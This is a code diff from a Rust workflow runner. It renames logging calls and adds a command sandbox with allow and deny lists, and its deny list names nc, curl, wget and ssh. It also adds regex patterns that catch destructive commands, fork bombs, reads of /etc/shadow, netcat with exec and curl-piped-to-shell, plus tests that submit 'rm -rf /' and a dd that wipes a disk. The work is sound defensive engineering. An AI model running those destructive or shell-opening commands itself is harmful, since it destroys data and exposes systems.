logging::info(&format!(
wrkflw_logging::info(&format!(
"Using actual working directory: {}",
actual_working_dir.display()
));
@@ -233,8 +233,8 @@ impl ContainerRuntime for EmulationRuntime {
// Check if path contains the command (for shell script execution)
let command_path = which::which(command[0]);
match &command_path {
Ok(path) => logging::info(&format!("Found command at: {}", path.display())),
Err(e) => logging::error(&format!(
Ok(path) => wrkflw_logging::info(&format!("Found command at: {}", path.display())),
Err(e) => wrkflw_logging::error(&format!(
"Command not found in PATH: {} - Error: {}",
command[0], e
)),
@@ -246,7 +246,7 @@ impl ContainerRuntime for EmulationRuntime {
|| command_str.starts_with("mkdir ")
|| command_str.starts_with("mv ")
{
logging::info("Executing as shell command");
wrkflw_logging::info("Executing as shell command");
// Execute as a shell command
let mut cmd = Command::new("sh");
cmd.arg("-c");
@@ -264,7 +264,7 @@ impl ContainerRuntime for EmulationRuntime {
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Shell command completed with exit code: {}",
exit_code
));
@@ -314,7 +314,7 @@ impl ContainerRuntime for EmulationRuntime {
// Always use the current directory for cargo/rust commands rather than the temporary directory
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using project directory for Rust command: {}",
current_dir.display()
));
@@ -326,7 +326,7 @@ impl ContainerRuntime for EmulationRuntime {
if *key == "CARGO_HOME" && value.contains("${CI_PROJECT_DIR}") {
let cargo_home =
value.replace("${CI_PROJECT_DIR}", &current_dir.to_string_lossy());
logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
wrkflw_logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
cmd.env(key, cargo_home);
} else {
cmd.env(key, value);
@@ -338,7 +338,7 @@ impl ContainerRuntime for EmulationRuntime {
cmd.args(&parts[1..]);
}
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Executing Rust command: {} in {}",
command_str,
current_dir.display()
@@ -350,7 +350,7 @@ impl ContainerRuntime for EmulationRuntime {
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
logging::debug(&format!("Command exit code: {}", exit_code));
wrkflw_logging::debug(&format!("Command exit code: {}", exit_code));
if exit_code != 0 {
let mut error_details = format!(
@@ -405,7 +405,7 @@ impl ContainerRuntime for EmulationRuntime {
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
logging::debug(&format!("Command completed with exit code: {}", exit_code));
wrkflw_logging::debug(&format!("Command completed with exit code: {}", exit_code));
if exit_code != 0 {
let mut error_details = format!(
@@ -443,12 +443,12 @@ impl ContainerRuntime for EmulationRuntime {
}
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
wrkflw_logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
Ok(())
}
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Emulation: Pretending to build image {} from {}",
tag,
dockerfile.display()
@@ -543,14 +543,14 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
"latest"
};
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Processing action: {} @ {}",
action_name, action_version
));
// Handle specific known actions with special requirements
if action.starts_with("cachix/install-nix-action") {
logging::info("🔄 Emulating cachix/install-nix-action");
wrkflw_logging::info("🔄 Emulating cachix/install-nix-action");
// In emulation mode, check if nix is installed
let nix_installed = Command::new("which")
@@ -560,56 +560,56 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
.unwrap_or(false);
if !nix_installed {
logging::info("🔄 Emulation: Nix is required but not installed.");
logging::info(
wrkflw_logging::info("🔄 Emulation: Nix is required but not installed.");
wrkflw_logging::info(
"🔄 To use this workflow, please install Nix: https://nixos.org/download.html",
);
logging::info("🔄 Continuing emulation, but nix commands will fail.");
wrkflw_logging::info("🔄 Continuing emulation, but nix commands will fail.");
} else {
logging::info("🔄 Emulation: Using system-installed Nix");
wrkflw_logging::info("🔄 Emulation: Using system-installed Nix");
}
} else if action.starts_with("actions-rs/cargo@") {
// For actions-rs/cargo action, ensure Rust is available
logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
// Verify Rust/cargo is installed
check_command_available("cargo", "Rust/Cargo", "https://rustup.rs/");
} else if action.starts_with("actions-rs/toolchain@") {
// For actions-rs/toolchain action, check for Rust installation
logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
check_command_available("rustc", "Rust", "https://rustup.rs/");
} else if action.starts_with("actions-rs/fmt@") {
// For actions-rs/fmt action, check if rustfmt is available
logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
check_command_available("rustfmt", "rustfmt", "rustup component add rustfmt");
} else if action.starts_with("actions/setup-node@") {
// Node.js setup action
logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
check_command_available("node", "Node.js", "https://nodejs.org/");
} else if action.starts_with("actions/setup-python@") {
// Python setup action
logging::info(&format!("🔄 Detected Python setup action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Python setup action: {}", action));
check_command_available("python", "Python", "https://www.python.org/downloads/");
} else if action.starts_with("actions/setup-java@") {
// Java setup action
logging::info(&format!("🔄 Detected Java setup action: {}", action));
wrkflw_logging::info(&format!("🔄 Detected Java setup action: {}", action));
check_command_available("java", "Java", "https://adoptium.net/");
} else if action.starts_with("actions/checkout@") {
// Git checkout action - this is handled implicitly by our workspace setup
logging::info("🔄 Detected checkout action - workspace files are already prepared");
wrkflw_logging::info("🔄 Detected checkout action - workspace files are already prepared");
} else if action.starts_with("actions/cache@") {
// Cache action - can't really emulate caching effectively
logging::info(
wrkflw_logging::info(
"🔄 Detected cache action - caching is not fully supported in emulation mode",
);
} else {
// Generic action we don't have special handling for
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Action '{}' has no special handling in emulation mode",
action_name
));
@@ -628,12 +628,12 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
.unwrap_or(false);
if !is_available {
logging::warning(&format!("{} is required but not found on the system", name));
logging::info(&format!(
wrkflw_logging::warning(&format!("{} is required but not found on the system", name));
wrkflw_logging::info(&format!(
"To use this action, please install {}: {}",
name, install_url
));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Continuing emulation, but {} commands will fail",
name
));
@@ -642,7 +642,7 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
if let Ok(output) = Command::new(command).arg("--version").output() {
if output.status.success() {
let version = String::from_utf8_lossy(&output.stdout);
logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
wrkflw_logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
}
}
}
@@ -708,7 +708,7 @@ async fn cleanup_processes() {
};
for pid in processes_to_cleanup {
logging::info(&format!("Cleaning up emulated process: {}", pid));
wrkflw_logging::info(&format!("Cleaning up emulated process: {}", pid));
#[cfg(unix)]
{
@@ -747,7 +747,7 @@ async fn cleanup_workspaces() {
};
for workspace_path in workspaces_to_cleanup {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up emulation workspace: {}",
workspace_path.display()
));
@@ -755,8 +755,8 @@ async fn cleanup_workspaces() {
// Only attempt to remove if it exists
if workspace_path.exists() {
match fs::remove_dir_all(&workspace_path) {
Ok(_) => logging::info("Successfully removed workspace directory"),
Err(e) => logging::error(&format!("Error removing workspace: {}", e)),
Ok(_) => wrkflw_logging::info("Successfully removed workspace directory"),
Err(e) => wrkflw_logging::error(&format!("Error removing workspace: {}", e)),
}
}

View File

@@ -2,3 +2,5 @@
pub mod container;
pub mod emulation;
pub mod sandbox;
pub mod secure_emulation;

View File

@@ -0,0 +1,672 @@
use regex::Regex;
use std::collections::HashSet;
use std::fs;
use std::path::{Path, PathBuf};
use std::process::{Command, Stdio};
use std::time::Duration;
use tempfile::TempDir;
use wrkflw_logging;
/// Configuration for sandbox execution
#[derive(Debug, Clone)]
pub struct SandboxConfig {
/// Maximum execution time for commands
pub max_execution_time: Duration,
/// Maximum memory usage in MB
pub max_memory_mb: u64,
/// Maximum CPU usage percentage
pub max_cpu_percent: u64,
/// Allowed commands (whitelist)
pub allowed_commands: HashSet<String>,
/// Blocked commands (blacklist)
pub blocked_commands: HashSet<String>,
/// Allowed file system paths (read-only)
pub allowed_read_paths: HashSet<PathBuf>,
/// Allowed file system paths (read-write)
pub allowed_write_paths: HashSet<PathBuf>,
/// Whether to enable network access
pub allow_network: bool,
/// Maximum number of processes
pub max_processes: u32,
/// Whether to enable strict mode (more restrictive)
pub strict_mode: bool,
}
impl Default for SandboxConfig {
fn default() -> Self {
let mut allowed_commands = HashSet::new();
// Basic safe commands
allowed_commands.insert("echo".to_string());
allowed_commands.insert("printf".to_string());
allowed_commands.insert("cat".to_string());
allowed_commands.insert("head".to_string());
allowed_commands.insert("tail".to_string());
allowed_commands.insert("grep".to_string());
allowed_commands.insert("sed".to_string());
allowed_commands.insert("awk".to_string());
allowed_commands.insert("sort".to_string());
allowed_commands.insert("uniq".to_string());
allowed_commands.insert("wc".to_string());
allowed_commands.insert("cut".to_string());
allowed_commands.insert("tr".to_string());
allowed_commands.insert("which".to_string());
allowed_commands.insert("pwd".to_string());
allowed_commands.insert("env".to_string());
allowed_commands.insert("date".to_string());
allowed_commands.insert("basename".to_string());
allowed_commands.insert("dirname".to_string());
// File operations (safe variants)
allowed_commands.insert("ls".to_string());
allowed_commands.insert("find".to_string());
allowed_commands.insert("mkdir".to_string());
allowed_commands.insert("touch".to_string());
allowed_commands.insert("cp".to_string());
allowed_commands.insert("mv".to_string());
// Development tools
allowed_commands.insert("git".to_string());
allowed_commands.insert("cargo".to_string());
allowed_commands.insert("rustc".to_string());
allowed_commands.insert("rustfmt".to_string());
allowed_commands.insert("clippy".to_string());
allowed_commands.insert("npm".to_string());
allowed_commands.insert("yarn".to_string());
allowed_commands.insert("node".to_string());
allowed_commands.insert("python".to_string());
allowed_commands.insert("python3".to_string());
allowed_commands.insert("pip".to_string());
allowed_commands.insert("pip3".to_string());
allowed_commands.insert("java".to_string());
allowed_commands.insert("javac".to_string());
allowed_commands.insert("maven".to_string());
allowed_commands.insert("gradle".to_string());
allowed_commands.insert("go".to_string());
allowed_commands.insert("dotnet".to_string());
// Compression tools
allowed_commands.insert("tar".to_string());
allowed_commands.insert("gzip".to_string());
allowed_commands.insert("gunzip".to_string());
allowed_commands.insert("zip".to_string());
allowed_commands.insert("unzip".to_string());
let mut blocked_commands = HashSet::new();
// Dangerous system commands
blocked_commands.insert("rm".to_string());
blocked_commands.insert("rmdir".to_string());
blocked_commands.insert("dd".to_string());
blocked_commands.insert("mkfs".to_string());
blocked_commands.insert("fdisk".to_string());
blocked_commands.insert("mount".to_string());
blocked_commands.insert("umount".to_string());
blocked_commands.insert("sudo".to_string());
blocked_commands.insert("su".to_string());
blocked_commands.insert("passwd".to_string());
blocked_commands.insert("chown".to_string());
blocked_commands.insert("chmod".to_string());
blocked_commands.insert("chgrp".to_string());
blocked_commands.insert("chroot".to_string());
// Network and system tools
blocked_commands.insert("nc".to_string());
blocked_commands.insert("netcat".to_string());
blocked_commands.insert("wget".to_string());
blocked_commands.insert("curl".to_string());
blocked_commands.insert("ssh".to_string());
blocked_commands.insert("scp".to_string());
blocked_commands.insert("rsync".to_string());
// Process control
blocked_commands.insert("kill".to_string());
blocked_commands.insert("killall".to_string());
blocked_commands.insert("pkill".to_string());
blocked_commands.insert("nohup".to_string());
blocked_commands.insert("screen".to_string());
blocked_commands.insert("tmux".to_string());
// System modification
blocked_commands.insert("systemctl".to_string());
blocked_commands.insert("service".to_string());
blocked_commands.insert("crontab".to_string());
blocked_commands.insert("at".to_string());
blocked_commands.insert("reboot".to_string());
blocked_commands.insert("shutdown".to_string());
blocked_commands.insert("halt".to_string());
blocked_commands.insert("poweroff".to_string());
Self {
max_execution_time: Duration::from_secs(300), // 5 minutes
max_memory_mb: 512,
max_cpu_percent: 80,
allowed_commands,
blocked_commands,
allowed_read_paths: HashSet::new(),
allowed_write_paths: HashSet::new(),
allow_network: false,
max_processes: 10,
strict_mode: true,
}
}
}
/// Sandbox error types
#[derive(Debug, thiserror::Error)]
pub enum SandboxError {
#[error("Command blocked by security policy: {command}")]
BlockedCommand { command: String },
#[error("Dangerous command pattern detected: {pattern}")]
DangerousPattern { pattern: String },
#[error("Path access denied: {path}")]
PathAccessDenied { path: String },
#[error("Resource limit exceeded: {resource}")]
ResourceLimitExceeded { resource: String },
#[error("Execution timeout after {seconds} seconds")]
ExecutionTimeout { seconds: u64 },
#[error("Sandbox setup failed: {reason}")]
SandboxSetupError { reason: String },
#[error("Command execution failed: {reason}")]
ExecutionError { reason: String },
}
/// Secure sandbox for executing commands in emulation mode
pub struct Sandbox {
config: SandboxConfig,
workspace: TempDir,
dangerous_patterns: Vec<Regex>,
}
impl Sandbox {
/// Create a new sandbox with the given configuration
pub fn new(config: SandboxConfig) -> Result<Self, SandboxError> {
let workspace = tempfile::tempdir().map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to create sandbox workspace: {}", e),
})?;
let dangerous_patterns = Self::compile_dangerous_patterns();
wrkflw_logging::info(&format!(
"Created new sandbox with workspace: {}",
workspace.path().display()
));
Ok(Self {
config,
workspace,
dangerous_patterns,
})
}
/// Execute a command in the sandbox
pub async fn execute_command(
&self,
command: &[&str],
env_vars: &[(&str, &str)],
working_dir: &Path,
) -> Result<crate::container::ContainerOutput, SandboxError> {
if command.is_empty() {
return Err(SandboxError::ExecutionError {
reason: "Empty command".to_string(),
});
}
let command_str = command.join(" ");
// Step 1: Validate command
self.validate_command(&command_str)?;
// Step 2: Setup sandbox environment
let sandbox_dir = self.setup_sandbox_environment(working_dir)?;
// Step 3: Execute with limits
self.execute_with_limits(command, env_vars, &sandbox_dir)
.await
}
/// Validate that a command is safe to execute
fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
// Check for dangerous patterns first
for pattern in &self.dangerous_patterns {
if pattern.is_match(command_str) {
wrkflw_logging::warning(&format!(
"🚫 Blocked dangerous command pattern: {}",
command_str
));
return Err(SandboxError::DangerousPattern {
pattern: command_str.to_string(),
});
}
}
// Split command by shell operators to validate each part
let command_parts = self.split_shell_command(command_str);
for part in command_parts {
let part = part.trim();
if part.is_empty() {
continue;
}
// Extract the base command from this part
let base_command = part.split_whitespace().next().unwrap_or("");
let command_name = Path::new(base_command)
.file_name()
.and_then(|s| s.to_str())
.unwrap_or(base_command);
// Skip shell built-ins and operators
if self.is_shell_builtin(command_name) {
continue;
}
// Check blocked commands
if self.config.blocked_commands.contains(command_name) {
wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
return Err(SandboxError::BlockedCommand {
command: command_name.to_string(),
});
}
// In strict mode, only allow whitelisted commands
if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
wrkflw_logging::warning(&format!(
"🚫 Command not in whitelist (strict mode): {}",
command_name
));
return Err(SandboxError::BlockedCommand {
command: command_name.to_string(),
});
}
}
wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
Ok(())
}
/// Split shell command by operators while preserving quoted strings
fn split_shell_command(&self, command_str: &str) -> Vec<String> {
// Simple split by common shell operators
// This is not a full shell parser but handles most cases
let separators = ["&&", "||", ";", "|"];
let mut parts = vec![command_str.to_string()];
for separator in separators {
let mut new_parts = Vec::new();
for part in parts {
let split_parts: Vec<String> = part
.split(separator)
.map(|s| s.trim().to_string())
.filter(|s| !s.is_empty())
.collect();
new_parts.extend(split_parts);
}
parts = new_parts;
}
parts
}
/// Check if a command is a shell built-in
fn is_shell_builtin(&self, command: &str) -> bool {
let builtins = [
"true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
"alias", "history", "jobs", "fg", "bg", "wait", "read",
];
builtins.contains(&command)
}
/// Setup isolated sandbox environment
fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
let sandbox_root = self.workspace.path();
let sandbox_workspace = sandbox_root.join("workspace");
// Create sandbox directory structure
fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to create sandbox workspace: {}", e),
})?;
// Copy allowed files to sandbox (if working_dir exists and is allowed)
if working_dir.exists() && self.is_path_allowed(working_dir, false) {
self.copy_safe_files(working_dir, &sandbox_workspace)?;
}
wrkflw_logging::info(&format!(
"Sandbox environment ready: {}",
sandbox_workspace.display()
));
Ok(sandbox_workspace)
}
/// Copy files safely to sandbox, excluding dangerous files
fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to read source directory: {}", e),
})? {
let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to read directory entry: {}", e),
})?;
let path = entry.path();
let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");
// Skip dangerous or sensitive files
if self.should_skip_file(file_name) {
continue;
}
let dest_path = dest.join(file_name);
if path.is_file() {
fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to copy file: {}", e),
})?;
} else if path.is_dir() && !self.should_skip_directory(file_name) {
fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
reason: format!("Failed to create directory: {}", e),
})?;
self.copy_safe_files(&path, &dest_path)?;
}
}
Ok(())
}
/// Execute command with resource limits and monitoring
async fn execute_with_limits(
&self,
command: &[&str],
env_vars: &[(&str, &str)],
working_dir: &Path,
) -> Result<crate::container::ContainerOutput, SandboxError> {
// Join command parts and execute via shell for proper handling of operators
let command_str = command.join(" ");
let mut cmd = Command::new("sh");
cmd.arg("-c");
cmd.arg(&command_str);
cmd.current_dir(working_dir);
cmd.stdout(Stdio::piped());
cmd.stderr(Stdio::piped());
// Set environment variables (filtered)
for (key, value) in env_vars {
if self.is_env_var_safe(key) {
cmd.env(key, value);
}
}
// Add sandbox-specific environment variables
cmd.env("WRKFLW_SANDBOXED", "true");
cmd.env("WRKFLW_SANDBOX_MODE", "strict");
// Execute with timeout
let timeout_duration = self.config.max_execution_time;
wrkflw_logging::info(&format!(
"🏃 Executing sandboxed command: {} (timeout: {}s)",
command.join(" "),
timeout_duration.as_secs()
));
let start_time = std::time::Instant::now();
let result = tokio::time::timeout(timeout_duration, async {
let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
reason: format!("Command execution failed: {}", e),
})?;
Ok(crate::container::ContainerOutput {
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
exit_code: output.status.code().unwrap_or(-1),
})
})
.await;
let execution_time = start_time.elapsed();
match result {
Ok(output_result) => {
wrkflw_logging::info(&format!(
"✅ Sandboxed command completed in {:.2}s",
execution_time.as_secs_f64()
));
output_result
}
Err(_) => {
wrkflw_logging::warning(&format!(
"⏰ Sandboxed command timed out after {:.2}s",
timeout_duration.as_secs_f64()
));
Err(SandboxError::ExecutionTimeout {
seconds: timeout_duration.as_secs(),
})
}
}
}
/// Check if a path is allowed for access
fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());
if write_access {
self.config
.allowed_write_paths
.iter()
.any(|allowed| abs_path.starts_with(allowed))
} else {
self.config
.allowed_read_paths
.iter()
.any(|allowed| abs_path.starts_with(allowed))
|| self
.config
.allowed_write_paths
.iter()
.any(|allowed| abs_path.starts_with(allowed))
}
}
/// Check if an environment variable is safe to pass through
fn is_env_var_safe(&self, key: &str) -> bool {
// Block dangerous environment variables
let dangerous_env_vars = [
"LD_PRELOAD",
"LD_LIBRARY_PATH",
"DYLD_INSERT_LIBRARIES",
"DYLD_LIBRARY_PATH",
"PATH",
"HOME",
"SHELL",
];
!dangerous_env_vars.contains(&key)
}
/// Check if a file should be skipped during copying
fn should_skip_file(&self, filename: &str) -> bool {
let dangerous_files = [
".ssh",
".gnupg",
".aws",
".docker",
"id_rsa",
"id_ed25519",
"credentials",
"config",
".env",
".secrets",
];
dangerous_files
.iter()
.any(|pattern| filename.contains(pattern))
|| filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
}
/// Check if a directory should be skipped
fn should_skip_directory(&self, dirname: &str) -> bool {
let skip_dirs = [
"target",
"node_modules",
".git",
".cargo",
".npm",
".cache",
"build",
"dist",
"tmp",
"temp",
];
skip_dirs.contains(&dirname)
}
/// Compile regex patterns for dangerous command detection
fn compile_dangerous_patterns() -> Vec<Regex> {
let patterns = [
r"rm\s+.*-rf?\s*/", // rm -rf /
r"dd\s+.*of=/dev/", // dd ... of=/dev/...
r">\s*/dev/sd[a-z]", // > /dev/sda
r"mkfs\.", // mkfs.ext4, etc.
r"fdisk\s+/dev/", // fdisk /dev/...
r"mount\s+.*\s+/", // mount ... /
r"chroot\s+/", // chroot /
r"sudo\s+", // sudo commands
r"su\s+", // su commands
r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
r"sh\s+-c\s+.*rm.*-rf", // sh -c "rm -rf ..."
r"eval\s+.*rm.*-rf", // eval "rm -rf ..."
r":\(\)\{.*;\};:", // Fork bomb
r"/proc/sys/", // /proc/sys access
r"/etc/passwd", // /etc/passwd access
r"/etc/shadow", // /etc/shadow access
r"nc\s+.*-e", // netcat with exec
r"wget\s+.*\|\s*sh", // wget ... | sh
r"curl\s+.*\|\s*sh", // curl ... | sh
];
patterns
.iter()
.filter_map(|pattern| {
Regex::new(pattern)
.map_err(|e| {
wrkflw_logging::warning(&format!(
"Invalid regex pattern {}: {}",
pattern, e
));
e
})
.ok()
})
.collect()
}
}
/// Create a default sandbox configuration for CI/CD workflows
pub fn create_workflow_sandbox_config() -> SandboxConfig {
let mut allowed_read_paths = HashSet::new();
allowed_read_paths.insert(PathBuf::from("."));
let mut allowed_write_paths = HashSet::new();
allowed_write_paths.insert(PathBuf::from("."));
SandboxConfig {
max_execution_time: Duration::from_secs(1800), // 30 minutes
max_memory_mb: 2048, // 2GB
max_processes: 50,
allow_network: true,
strict_mode: false,
allowed_read_paths,
allowed_write_paths,
..Default::default()
}
}
/// Create a strict sandbox configuration for untrusted code
pub fn create_strict_sandbox_config() -> SandboxConfig {
let mut allowed_read_paths = HashSet::new();
allowed_read_paths.insert(PathBuf::from("."));
let mut allowed_write_paths = HashSet::new();
allowed_write_paths.insert(PathBuf::from("."));
// Very limited command set
let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
.iter()
.map(|s| s.to_string())
.collect();
SandboxConfig {
max_execution_time: Duration::from_secs(60), // 1 minute
max_memory_mb: 128, // 128MB
max_processes: 5,
allow_network: false,
strict_mode: true,
allowed_read_paths,
allowed_write_paths,
allowed_commands,
..Default::default()
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_dangerous_pattern_detection() {
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
// Should block dangerous commands
assert!(sandbox.validate_command("rm -rf /").is_err());
assert!(sandbox
.validate_command("dd if=/dev/zero of=/dev/sda")
.is_err());
assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());
// Should allow safe commands
assert!(sandbox.validate_command("echo hello").is_ok());
assert!(sandbox.validate_command("ls -la").is_ok());
assert!(sandbox.validate_command("cargo build").is_ok());
}
#[test]
fn test_command_whitelist() {
let config = create_strict_sandbox_config();
let sandbox = Sandbox::new(config).unwrap();
// Should allow whitelisted commands
assert!(sandbox.validate_command("echo hello").is_ok());
assert!(sandbox.validate_command("ls").is_ok());
// Should block non-whitelisted commands
assert!(sandbox.validate_command("git clone").is_err());
assert!(sandbox.validate_command("cargo build").is_err());
}
#[test]
fn test_file_filtering() {
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
// Should skip dangerous files
assert!(sandbox.should_skip_file("id_rsa"));
assert!(sandbox.should_skip_file(".ssh"));
assert!(sandbox.should_skip_file("credentials"));
// Should allow safe files
assert!(!sandbox.should_skip_file("Cargo.toml"));
assert!(!sandbox.should_skip_file("README.md"));
assert!(!sandbox.should_skip_file(".gitignore"));
}
}

View File

@@ -0,0 +1,339 @@
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
use async_trait::async_trait;
use std::path::Path;
use wrkflw_logging;
/// Secure emulation runtime that uses sandboxing for safety
pub struct SecureEmulationRuntime {
sandbox: Sandbox,
}
impl Default for SecureEmulationRuntime {
fn default() -> Self {
Self::new()
}
}
impl SecureEmulationRuntime {
/// Create a new secure emulation runtime with default workflow-friendly configuration
pub fn new() -> Self {
let config = create_workflow_sandbox_config();
let sandbox = Sandbox::new(config).expect("Failed to create sandbox");
wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");
Self { sandbox }
}
/// Create a new secure emulation runtime with custom sandbox configuration
pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
let sandbox = Sandbox::new(config).map_err(|e| {
ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
})?;
wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");
Ok(Self { sandbox })
}
}
#[async_trait]
impl ContainerRuntime for SecureEmulationRuntime {
async fn run_container(
&self,
image: &str,
command: &[&str],
env_vars: &[(&str, &str)],
working_dir: &Path,
_volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
wrkflw_logging::info(&format!(
"🔒 Executing sandboxed command: {} (image: {})",
command.join(" "),
image
));
// Use sandbox to execute the command safely
let result = self
.sandbox
.execute_command(command, env_vars, working_dir)
.await;
match result {
Ok(output) => {
wrkflw_logging::info("✅ Sandboxed command completed successfully");
Ok(output)
}
Err(SandboxError::BlockedCommand { command }) => {
let error_msg = format!(
"🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
This command was blocked for security reasons. \
If you need to run this command, please use Docker or Podman mode instead.",
command
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::DangerousPattern { pattern }) => {
let error_msg = format!(
"🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
This command was blocked because it matches a known dangerous pattern. \
Please review your workflow for potentially harmful commands.",
pattern
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::ExecutionTimeout { seconds }) => {
let error_msg = format!(
"⏰ Command execution timed out after {} seconds. \
Consider optimizing your command or increasing timeout limits.",
seconds
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::PathAccessDenied { path }) => {
let error_msg = format!(
"🚫 Path access denied: '{}'. \
The sandbox restricts file system access for security.",
path
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::ResourceLimitExceeded { resource }) => {
let error_msg = format!(
"📊 Resource limit exceeded: {}. \
Your command used too many system resources.",
resource
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(e) => {
let error_msg = format!("Sandbox execution failed: {}", e);
wrkflw_logging::error(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
}
}
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
wrkflw_logging::info(&format!(
"🔒 Secure emulation: Pretending to pull image {}",
image
));
Ok(())
}
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
wrkflw_logging::info(&format!(
"🔒 Secure emulation: Pretending to build image {} from {}",
tag,
dockerfile.display()
));
Ok(())
}
async fn prepare_language_environment(
&self,
language: &str,
version: Option<&str>,
_additional_packages: Option<Vec<String>>,
) -> Result<String, ContainerError> {
// For secure emulation runtime, we'll use a simplified approach
// that doesn't require building custom images
let base_image = match language {
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
format!("eclipse-temurin:{}", v)
}),
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
}),
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
_ => {
return Err(ContainerError::ContainerStart(format!(
"Unsupported language: {}",
language
)))
}
};
// For emulation, we'll just return the base image
// The actual package installation will be handled during container execution
Ok(base_image)
}
}
/// Handle special actions in secure emulation mode
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
// Extract owner, repo and version from the action
let action_parts: Vec<&str> = action.split('@').collect();
let action_name = action_parts[0];
let action_version = if action_parts.len() > 1 {
action_parts[1]
} else {
"latest"
};
wrkflw_logging::info(&format!(
"🔒 Processing action in secure mode: {} @ {}",
action_name, action_version
));
// In secure mode, we're more restrictive about what actions we allow
match action_name {
// Core GitHub actions that are generally safe
name if name.starts_with("actions/checkout") => {
wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
}
